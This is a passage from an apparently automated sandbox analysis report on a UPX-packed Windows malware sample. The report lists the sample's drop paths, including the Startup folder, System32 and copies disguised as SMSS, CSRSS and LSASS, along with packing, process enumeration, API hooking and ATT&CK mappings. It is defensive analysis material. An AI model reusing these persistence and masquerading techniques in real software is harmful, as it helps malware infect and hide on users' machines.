4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46942 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46780 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46961 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46772 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46837 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46799 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46878 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46891 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47042 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46859 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46837 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46812 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46908 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46876 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46829 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46910 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46762 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46840 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46803 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46820 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46936 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46829 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46896 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46818 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46816 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46875 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46978 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46790 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46885 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46898 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46896 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46853 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46783 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46739 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46805 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46792 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46908 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46836 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46758 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46865 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46831 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46820 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46724 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46722 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46754 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46893 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C456.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C711.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C458.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C8F5.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9CBEA.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has section name UPX1 with entropy \"7.85055163958\"\n \"services.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"shell.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"4k51k4.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS .exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"New Folder.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Data HAPUBWS.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Empty.pif\" has section name UPX1 with entropy \"7.85055163958\"\n \"WINLOGON.EXE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS.EXE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SERVICES.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C456.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SMSS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"LSASS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"MrHelloween.scr\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C711.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C458.bin\" has section name UPX1 with entropy \"7.85055163958\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has a section named \"UPX0\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has a section named \"UPX1\"\n \"services.exe\" has a section named \"UPX0\"\n \"services.exe\" has a section named \"UPX1\"\n \"shell.exe\" has a section named \"UPX0\"\n \"shell.exe\" has a section named \"UPX1\"\n \"4k51k4.exe\" has a section named \"UPX0\"\n \"4k51k4.exe\" has a section named \"UPX1\"\n \"CSRSS .exe\" has a section named \"UPX0\"\n \"CSRSS .exe\" has a section named \"UPX1\"\n \"New Folder.exe\" has a section named \"UPX0\"\n \"New Folder.exe\" has a section named \"UPX1\"\n \"Data HAPUBWS.exe\" has a section named \"UPX0\"\n \"Data HAPUBWS.exe\" has a section named \"UPX1\"\n \"Empty.pif\" has a section named \"UPX0\"\n \"Empty.pif\" has a section named \"UPX1\"\n \"WINLOGON.EXE.bin\" has a section named \"UPX0\"\n \"WINLOGON.EXE.bin\" has a section named \"UPX1\"\n \"CSRSS.EXE.bin\" has a section named \"UPX0\"\n \"CSRSS.EXE.bin\" has a section named \"UPX1\"\n \"SERVICES.EXE\" has a section named \"UPX0\"\n \"SERVICES.EXE\" has a section named \"UPX1\"\n \"4K51K4.EXE.67A9C456.bin\" has a section named \"UPX0\"\n \"4K51K4.EXE.67A9C456.bin\" has a section named \"UPX1\"\n \"SMSS.EXE\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FileTimeToLocalFileTime\" with parameter ea991354947bdb01 & ea01d8b59c7bdb01 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FileTimeToLocalFileTime\" with parameter 92f055b1947bdb01 & 92581a139d7bdb01 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FileTimeToLocalFileTime\" with parameter 73d761b1947bdb01 & s?& (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FileTimeToLocalFileTime\" with parameter 85aee3b0947bdb01 & 8516a8129d7bdb01 (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"FileTimeToLocalFileTime\" with parameter 30866db3947bdb01 & 30ee31159d7bdb01 (UID: 00000000-00005648)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005648)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"GetNativeSystemInfo@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in 